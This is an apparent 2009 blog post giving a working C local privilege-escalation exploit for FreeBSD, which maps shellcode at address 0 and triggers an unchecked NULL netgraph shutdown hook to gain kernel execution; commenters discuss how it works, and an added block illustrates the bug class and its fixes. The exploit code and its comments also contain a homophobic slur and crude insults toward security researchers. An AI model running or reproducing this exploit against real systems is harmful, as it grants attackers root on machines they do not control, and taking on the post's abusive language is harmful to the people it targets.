base3 ([info]base3) wrote,
@ 2009-01-15 00:33:00
#include <stdio.h>      /* printf() below needs this; missing in the original */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

/* What kind of faggot has bluetooth enabled on his FreeBSD desktop,  */
/* to which there are also untrusted users logged in? A vulnerability */
/* that could only ever be found by a twat of a 'security researcher' */

char payload[] = { 0x55, 0x64, 0xa1, 0x00, 0x00, 0x00, 0x00, 0x8b,
                   0x00, 0x8b, 0x40, 0x20, 0xc7, 0x40, 0x04, 0x00,
                   0x00, 0x00, 0x00, 0x89, 0xe5, 0x31, 0xc0, 0xc9,
                   0xc3, 0x00 };

int main(int argc, char** argv)
{
  int x;
  int f;
  int u;

  char *args[] = {"/bin/sh", 0};

  /* map the first page of a writable file at address 0 and copy the payload there */
  f = open("/home/base3/test", O_RDWR);

  mmap(0, 2048, PROT_WRITE | PROT_EXEC, MAP_FIXED, f, 0);
  strncpy((char *)0, payload, 26);

  /* open a netgraph socket and shut it down: the protocol's shutdown hook is
     NULL and is called unchecked, so the kernel jumps to the page mapped at 0 */
  x = socket(PF_NETGRAPH , SOCK_STREAM, PF_NETGRAPH);
  if (x == -1)
    printf("Fuck.\nAn error, number %d, happened\n", errno);

  shutdown (x, SHUT_RDWR);

  u = (int) geteuid();
  printf ("Your uid is %d\n", u);

  //execve(args[0], args, 0);

  return 0;
}




(5 comments) - (Post a new comment)


[info]angryskul
2009-01-15 01:58 pm UTC (link)
How the heck does that even work? I'm trying to read it and it looks like you:

1) open up a test file
2) mmap it to address 0
3) copy the payload to this address using strncpy (why not memcpy?)
4) open a netgraph socket
5) call shutdown on it
6) privs are elevated...

? wow...something about the shutdown hook in bluetooth's netgraph code?



[info]base3
2009-01-17 02:05 pm UTC (link)
the shutdown function for both bluetooth and netgraph protocol is initialized to NULL, but then it is called at socket shutdown without being tested for NULL.

this exploit was found by someone else (an overly self-important cocksucker of a 'security researcher') and reported, but i just felt like writing an exploit for it.

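The bug class base3 describes, as an added example that is not part of the post or of FreeBSD: a constructed miniature of the BSD protocol switch (the struct and function names are made up for the illustration), with the unchecked dispatch that makes a NULL handler a call through address 0, beside the two ways to close it.

```c
#include <errno.h>
#include <stdio.h>

struct socket;
typedef int (*pru_shutdown_fn)(struct socket *);
struct pr_usrreqs { pru_shutdown_fn pru_shutdown; };  /* a protocol may leave this NULL */
struct socket { const char *so_name; struct pr_usrreqs *so_pru; int so_state; };

/* One protocol implements shutdown; the other never filled the slot in. */
static int tcpish_shutdown(struct socket *so) { so->so_state |= 1; return 0; }
static struct pr_usrreqs tcpish_usrreqs = { tcpish_shutdown };
static struct pr_usrreqs nostub_usrreqs = { NULL };

/* VULNERABLE: trusts the table. A NULL entry is a kernel-mode call through
 * address 0, which is why the exploit above maps its code at page 0. */
int soshutdown_unchecked(struct socket *so) { return so->so_pru->pru_shutdown(so); }

/* Fix 1: check at the dispatch site. */
int soshutdown_checked(struct socket *so)
{
    if (so->so_pru->pru_shutdown == NULL)
        return EOPNOTSUPP;
    return so->so_pru->pru_shutdown(so);
}

/* Fix 2: never leave a NULL slot. Fill unset handlers with a stub at registration
 * time (the pattern FreeBSD's protocol-switch init uses), so no dispatch site and
 * no protocol author can forget the check. */
static int pru_shutdown_notsupp(struct socket *so) { (void)so; return EOPNOTSUPP; }
void pr_usrreqs_fill_defaults(struct pr_usrreqs *pru)
{
    if (pru->pru_shutdown == NULL)
        pru->pru_shutdown = pru_shutdown_notsupp;
}

/* Exercise each path; the return values are what a caller should assert on. */
int demo_checked_present(void) { struct socket so = { "tcpish", &tcpish_usrreqs, 0 }; return soshutdown_checked(&so); }
int demo_checked_missing(void) { struct socket so = { "nostub", &nostub_usrreqs, 0 }; return soshutdown_checked(&so); }
int demo_filled_unchecked(void)
{
    struct pr_usrreqs pru = { NULL };
    struct socket so = { "nostub", &pru, 0 };
    pr_usrreqs_fill_defaults(&pru);      /* slot now points at the stub */
    return soshutdown_unchecked(&so);    /* before the fill this would jump to 0 */
}

int main(void) { printf("present=%d missing=%d filled=%d\n", demo_checked_present(),
                        demo_checked_missing(), demo_filled_unchecked()); return 0; }
```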


[info]angryskul
2009-01-17 06:03 pm UTC (link)
It seems we share the same view of the shellcode variant of the "security researcher".

I do have some admiration of those that are able to use math, rather than just overruns/null to exploit things.



[info]base3
2009-01-20 12:37 am UTC (link)
they have their purpose, as long as they don't think they are some kind of superhero hacker, just for auditing some code (or even reverse engineering) and finding a buffer overflow



[info]angryskul
2009-01-20 01:51 am UTC (link)
Agreed, I find the whole process rather tedious myself.

go write a filesystem. :)


